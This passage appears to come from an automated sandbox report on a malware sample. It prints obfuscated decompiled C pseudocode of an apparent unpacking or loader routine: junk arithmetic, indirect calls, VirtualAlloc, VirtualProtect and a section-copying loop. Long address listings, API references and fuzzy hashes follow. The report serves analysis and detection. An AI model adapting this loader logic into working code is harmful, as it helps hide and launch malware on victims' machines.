					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_t469 = _t824 + 0x41d305; // 0x41d305
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t469;
				_t472 = _t824 + 0x41cf53; // 0x41cf53
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t472;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_t477 = _t827 + 0x41d2fb; // 0x41d2fb
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t477;
				_t480 = _t827 + 0x41c2ea; // 0x41c2ea
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t480;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					_t489 = _t827 + 0x41c966; // 0x41c966
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t489;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					_t494 = _t827 + 0x41ca40; // 0x41ca40
					 *_t1132 = _t494;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						_t504 = _t827 + 0x41c966; // 0x41c966
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t504;
						_t505 = _t827 + 0x41ca40; // 0x41ca40
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t505;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					_push(_t827);
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = L00EA4E1A(_t827, _t901, _t966, _t1091);
					 *_t1132 = _t1091;
					_t729 = E00EA2FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x00ea5f16
0x00ea5f16
0x00ea5f16
0x00ea5f16
0x00ea5f17
0x00ea5f1b
0x00ea5f1e
0x00ea5f20
0x00ea5f23
0x00ea5f24
0x00ea5f28
0x00ea5f2b
0x00ea5f2c
0x00ea5f30
0x00ea5f39
0x00ea5f3a
0x00ea5f3d
0x00ea5f46
0x00ea5f4a
0x00ea5f4d
0x00ea5f56
0x00ea5f57
0x00ea5f5a
0x00ea5f5d
0x00ea5f63
0x00ea5f66
0x00ea5f6e
0x00ea5f71
0x00ea5f72
0x00ea5f75
0x00ea5f78
0x00ea5f7b
0x00ea5f84
0x00ea5f85
0x00ea5f88
0x00ea5f8b
0x00ea5f91
0x00ea5f94
0x00ea5f9d
0x00ea5f9e
0x00ea5fa2
0x00ea5fa5
0x00ea5fab
0x00ea5fb1
0x00ea5fb5
0x00ea5fb8
0x00ea5fbb
0x00ea5fbe
0x00ea5fc0
0x00ea5fcb
0x00ea5fd2
0x00ea5fda
0x00ea5fdd
0x00ea5fe6
0x00ea5fe7
0x00ea5fea
0x00ea5ff3
0x00ea5ff4
0x00ea5ff7
0x00ea5ffa
0x00ea5ffa
0x00ea6002
0x00ea6005
0x00ea6009
0x00ea600d
0x00ea6017
0x00ea601b
0x00ea6025
0x00ea6029
0x00ea602c
0x00ea6032
0x00ea6039
0x00ea604b
0x00ea6054
0x00ea605e
0x00ea6067
0x00ea6068
0x00ea606b
0x00ea606e
0x00ea6074
0x00ea607b
0x00ea607e
0x00ea6088
0x00ea608b
0x00ea6094
0x00ea6095
0x00ea6098
0x00ea609b
0x00ea60a1
0x00ea60a7
0x00ea60ae
0x00ea60b7
0x00ea60be
0x00ea60c1
0x00ea60c8
0x00ea60cb
0x00ea60d4
0x00ea60db
0x00ea60de
0x00ea60e4
0x00ea60e7
0x00ea60ee
0x00ea60f1
0x00ea60f4
0x00ea60f7
0x00ea60f8
0x00ea6106
0x00ea6108
0x00ea610b
0x00ea6114
0x00ea6118
0x00ea6124
0x00ea6127
0x00ea612d
0x00ea6133
0x00ea613a
0x00ea6140
0x00ea6147
0x00ea614a
0x00ea614f
0x00ea6156
0x00ea615c
0x00ea615f
0x00ea6162
0x00ea616b
0x00ea616e
0x00ea6172
0x00ea6176
0x00ea617a
0x00ea617e
0x00ea6188
0x00ea618c
0x00ea6195
0x00ea619c
0x00ea619f
0x00ea61ab
0x00ea61b2
0x00ea61be
0x00ea61c1
0x00ea61c8
0x00ea61d1
0x00ea61db
0x00ea61de
0x00ea61e5
0x00ea61e8
0x00ea61f1
0x00ea61fb
0x00ea61fe
0x00ea6206
0x00ea6209
0x00ea6210
0x00ea6213
0x00ea6216
0x00ea6219
0x00ea621a
0x00ea621b
0x00ea6231
0x00ea6239
0x00ea6240
0x00ea6249
0x00ea6253
0x00ea6256
0x00ea6256
0x00ea625e
0x00ea6265
0x00ea626b
0x00ea626c
0x00ea6276
0x00ea6279
0x00ea6283
0x00ea628c
0x00ea6296
0x00ea6299
0x00ea629f
0x00ea62a9
0x00ea62b5
0x00ea62b8
0x00ea62c3
0x00ea62c6
0x00ea62cd
0x00ea62ce
0x00ea62d1
0x00ea62d2
0x00ea62dd
0x00ea62df
0x00ea62e4
0x00ea62ec
0x00ea62f6
0x00ea6300
0x00ea6303
0x00ea6306
0x00ea630c
0x00ea6314
0x00ea631b
0x00ea6321
0x00ea6321
0x00ea632a
0x00ea632d
0x00ea6335
0x00ea6338
0x00ea633b
0x00ea633e
0x00ea633f
0x00ea6343
0x00ea634d
0x00ea6351
0x00ea635d
0x00ea6360
0x00ea6368
0x00ea636f
0x00ea6375
0x00ea637c
0x00ea637f
0x00ea6385
0x00ea6389
0x00ea638c
0x00ea6396
0x00ea6399
0x00ea63a2
0x00ea63a9
0x00ea63ac
0x00ea63b4
0x00ea63bb
0x00ea63c1
0x00ea63c7
0x00ea63ca
0x00ea63d1
0x00ea63d3
0x00ea63dc
0x00ea63e6
0x00ea63e9
0x00ea63f0
0x00ea63f3
0x00ea63fd
0x00ea6400
0x00ea6403
0x00ea6412
0x00ea6417
0x00ea641b
0x00ea641e
0x00ea6420
0x00ea6421
0x00ea642c
0x00ea642e
0x00ea6433
0x00ea643c
0x00ea643f
0x00ea6448
0x00ea6452
0x00ea6455
0x00ea6455
0x00ea6461
0x00ea6468
0x00ea646e
0x00ea6474
0x00ea6477
0x00ea6483
0x00ea6486
0x00ea648c
0x00ea6494
0x00ea649b
0x00ea64a1
0x00ea64a6
0x00ea64b2
0x00ea64b6
0x00ea64b9
0x00ea64c1
0x00ea64c5
0x00ea64c8
0x00ea64d4
0x00ea64db
0x00ea64e1
0x00ea64e3
0x00ea64e6
0x00ea64f2
0x00ea64f5
0x00ea64fe
0x00ea650a
0x00ea650d
0x00ea6515
0x00ea6518
0x00ea651f
0x00ea6522
0x00ea6525
0x00ea6528
0x00ea6529
0x00ea6537
0x00ea6539
0x00ea653c
0x00ea653e
0x00ea6544
0x00ea654e
0x00ea6551
0x00ea6558
0x00ea655c
0x00ea655f
0x00ea655f
0x00ea6567
0x00ea656e
0x00ea6574
0x00ea6575
0x00ea6586
0x00ea6590
0x00ea6593
0x00ea659a
0x00ea659e
0x00ea65a1
0x00ea65a9
0x00ea65b0
0x00ea65b6
0x00ea65b7
0x00ea65ca
0x00ea65cc
0x00ea65ce
0x00ea65d2
0x00ea65d5
0x00ea65db
0x00ea65e5
0x00ea65e8
0x00ea65ee
0x00ea65f6
0x00ea65fd
0x00ea6603
0x00ea660b
0x00ea6610
0x00ea6618
0x00ea661b
0x00ea6622
0x00ea6625
0x00ea662b
0x00ea6632
0x00ea6635
0x00ea663c
0x00ea6640
0x00ea6643
0x00ea664a
0x00ea664e
0x00ea6651
0x00ea6659
0x00ea665f
0x00ea6666
0x00ea6667
0x00ea666a
0x00ea666b
0x00ea6671
0x00ea6674
0x00ea6677
0x00ea667a
0x00ea6685
0x00ea668f
0x00ea6693
0x00ea6696
0x00ea669d
0x00ea66a0
0x00ea66a3
0x00ea66a3
0x00ea66a9
0x00ea66ac
0x00ea66af
0x00ea66c2
0x00ea66c6
0x00ea66c9
0x00ea66d2
0x00ea66dc
0x00ea66e8
0x00ea66eb
0x00ea66f1
0x00ea66f8
0x00ea66fe
0x00ea6703
0x00ea6706
0x00ea670b
0x00ea670e
0x00ea6713
0x00ea671a
0x00ea671d
0x00ea6720
0x00ea6727
0x00ea6730
0x00ea673a
0x00ea673d
0x00ea6743
0x00ea674d
0x00ea6757
0x00ea675b
0x00ea675e
0x00ea676d
0x00ea6774
0x00ea6777
0x00ea677a
0x00ea677d
0x00ea677e
0x00ea677f
0x00ea6781
0x00ea678c
0x00ea6791
0x00ea679a
0x00ea679d
0x00ea67a7
0x00ea67ab
0x00ea67ae
0x00ea67b4
0x00ea67b6
0x00ea67bd
0x00ea67c3
0x00ea67c4
0x00ea67c7
0x00ea67cc
0x00ea67cf
0x00ea67d2
0x00ea67d2
0x00ea67d3
0x00ea67dd
0x00ea67e0
0x00ea67e7
0x00ea67f1
0x00ea67f4
0x00ea67f7
0x00ea67fe
0x00ea6801
0x00ea680b
0x00ea680f
0x00ea6812
0x00ea681d
0x00ea6824
0x00ea6827
0x00ea682a
0x00ea682d
0x00ea682e
0x00ea682f
0x00ea6841
0x00ea684c
0x00ea6858
0x00ea685b
0x00ea6861
0x00ea6868
0x00ea686e
0x00ea6873
0x00ea6876
0x00ea687e
0x00ea6881
0x00ea6881
0x00ea6889
0x00ea688d
0x00ea6897
0x00ea689b
0x00ea68a4
0x00ea68ae
0x00ea68b1
0x00ea68bd
0x00ea68c4
0x00ea68cd
0x00ea68d0
0x00ea68d3
0x00ea68e0
0x00ea68e4
0x00ea68e7
0x00ea68f0
0x00ea68f7
0x00ea6900
0x00ea6901
0x00ea6904
0x00ea6907
0x00ea6913
0x00ea6916
0x00ea6919
0x00ea6926
0x00ea692f
0x00ea6939
0x00ea693c
0x00ea6945
0x00ea6951
0x00ea6954
0x00ea6960
0x00ea6968
0x00ea696c
0x00ea6971
0x00ea6972
0x00ea697d
0x00ea697f
0x00ea6984
0x00ea6986
0x00ea698d
0x00ea6990
0x00ea6993
0x00ea699a
0x00ea699d
0x00ea69a0
0x00ea69a6
0x00ea69ae
0x00ea69b5
0x00ea69bb
0x00ea69c0
0x00ea69c3
0x00ea69c6
0x00ea69cd
0x00ea69d0
0x00ea69d6
0x00ea69d9
0x00ea69e0
0x00ea69e4
0x00ea69e7
0x00ea69f0
0x00ea69f3
0x00ea69fb
0x00ea6a02
0x00ea6a08
0x00ea6a0b
0x00ea6a0e
0x00ea6a13
0x00ea6a1a
0x00ea6a1e
0x00ea6a24
0x00ea6a27
0x00ea6a30
0x00ea6a33
0x00ea6a3f
0x00ea6a46
0x00ea6a4f
0x00ea6a52
0x00ea6a56
0x00ea6a5d
0x00ea6a64
0x00ea6a67
0x00ea6a6e
0x00ea6a72
0x00ea6a75
0x00ea6a7c
0x00ea6a80
0x00ea6a83
0x00ea6a8a
0x00ea6a8d
0x00ea6a90
0x00ea6a9f
0x00ea6aa6
0x00ea6aa9
0x00ea6aac
0x00ea6aaf
0x00ea6ab0
0x00ea6ab3
0x00ea6abe
0x00ea6ac0
0x00ea6ac3
0x00ea6ac5
0x00ea6acc
0x00ea6acf
0x00ea6ad2
0x00ea6ad9
0x00ea6adc
0x00ea6adf
0x00ea6ae5
0x00ea6aec
0x00ea6af2
0x00ea6af2
0x00ea6af5
0x00ea6af8
0x00ea6afc
0x00ea6aff
0x00ea6b02
0x00ea6b09
0x00ea6b0c
0x00ea6b0f
0x00ea6b17
0x00ea6b1e
0x00ea6b24
0x00ea6b25
0x00ea6b2c
0x00ea6b2f
0x00ea6b35
0x00ea6b3f
0x00ea6b42
0x00ea6b49
0x00ea6b4c
0x00ea6b4f
0x00ea6b55
0x00ea6b5c
0x00ea6b62
0x00ea6b65
0x00ea6b6b
0x00ea6b71
0x00ea6b7b
0x00ea6b7e
0x00ea6b85
0x00ea6b88
0x00ea6b8b
0x00ea6b91
0x00ea6b99
0x00ea6ba0
0x00ea6ba6
0x00ea6ba6
0x00ea6baf
0x00ea6bb5
0x00ea6bbb
0x00ea6bc5
0x00ea6bc8
0x00ea6bcf
0x00ea6bd2
0x00ea6bd5
0x00ea6bdb
0x00ea6be2
0x00ea6be8
0x00ea6bf4
0x00ea6bf6
0x00ea6bf7
0x00ea6bfd
0x00ea6c07
0x00ea6c0a
0x00ea6c10
0x00ea6c17
0x00ea6c20
0x00ea6c21
0x00ea6c24
0x00ea6c27
0x00ea6c2d
0x00ea6c30
0x00ea6c33
0x00ea6c3a
0x00ea6c3d
0x00ea6c40
0x00ea6c46
0x00ea6c4d
0x00ea6c50
0x00ea6c59
0x00ea6c5c
0x00ea6c6b
0x00ea6c72
0x00ea6c75
0x00ea6c78
0x00ea6c7b
0x00ea6c7c
0x00ea6c7d
0x00ea6c88
0x00ea6c8a
0x00ea6c8f
0x00ea6c91
0x00ea6c98
0x00ea6c9b
0x00ea6c9e
0x00ea6ca5
0x00ea6ca9
0x00ea6cac
0x00ea6cac
0x00ea6cb4
0x00ea6cbb
0x00ea6cc2
0x00ea6ccc
0x00ea6cd5
0x00ea6cdc
0x00ea6cdf
0x00ea6ce8
0x00ea6cf1
0x00ea6cf8
0x00ea6cfb
0x00ea6d06
0x00ea6d09
0x00ea6d10
0x00ea6d11
0x00ea6d14
0x00ea6d15
0x00ea6d1b
0x00ea6d1e
0x00ea6d21
0x00ea6d24
0x00ea6d2d
0x00ea6d30
0x00ea6d39
0x00ea6d40
0x00ea6d43
0x00ea6d43
0x00ea6d49
0x00ea6d51
0x00ea6d58
0x00ea6d63
0x00ea6d6b
0x00ea6d6d
0x00ea6d6f
0x00ea6d73
0x00ea6d7c
0x00ea6d86
0x00ea6d90
0x00ea6d93
0x00ea6d96
0x00ea6d9c
0x00ea6da4
0x00ea6dab
0x00ea6db1
0x00ea6dba
0x00ea6dc4
0x00ea6dc5
0x00ea6dc8
0x00ea6dcb
0x00ea6dce
0x00ea6dcf
0x00ea6dd0
0x00ea6dda
0x00ea6de4
0x00ea6de8
0x00ea6df1
0x00ea6dfb
0x00ea6dfe
0x00ea6e06
0x00ea6e0d
0x00ea6e13
0x00ea6e16
0x00ea6e19
0x00ea6e1c
0x00ea6e20
0x00ea6e24
0x00ea6e2e
0x00ea6e31
0x00ea6e34
0x00ea6e3b
0x00ea6e3e
0x00ea6e48
0x00ea6e4b
0x00ea6e4e
0x00ea6e5a
0x00ea6e62
0x00ea6e66
0x00ea6e6b
0x00ea6e6c
0x00ea6e72
0x00ea6e75
0x00ea6e78
0x00ea6e7b
0x00ea6e7d
0x00ea6e84
0x00ea6e87
0x00ea6e8a
0x00ea6e91
0x00ea6e94
0x00ea6e97
0x00ea6e9d
0x00ea6ea4
0x00ea6eaa
0x00ea6eaa
0x00ea6eb9
0x00ea6ec8
0x00ea6ec9
0x00ea6ec9
0x00ea6ec9
0x00ea6ed4
0x00ea6ed7
0x00ea6ee0
0x00ea6ee2
0x00ea6ee3
0x00ea6ee3
0x00ea6ee3
0x00ea6eec
0x00ea6eef
0x00ea6ef2
0x00ea6f07
0x00ea6f0a
0x00ea6f0d
0x00ea6f10
0x00ea6f11
0x00ea6f14
0x00ea6f1b
0x00ea6f21
0x00ea6f22
0x00ea6f31
0x00ea6f33
0x00ea6f39
0x00ea6f3b
0x00ea6f3c
0x00ea6f40
0x00ea6f43
0x00ea6f4b
0x00ea6f4e
0x00ea6f4e
0x00ea6f61
0x00ea6f68

APIs

VirtualProtect.KERNELBASE ref: 00EA6B65

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: 8faef7b120822a7fda444f1c5a871a2baff177ac5b2ed866c68cb660cc8dfbb6
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: 33C22572844608EFEB049FA0C8C57EEBBF5FF48320F0989ADD895AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00EA709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00EA709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E00EA2D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E00EA746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E00EA2A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
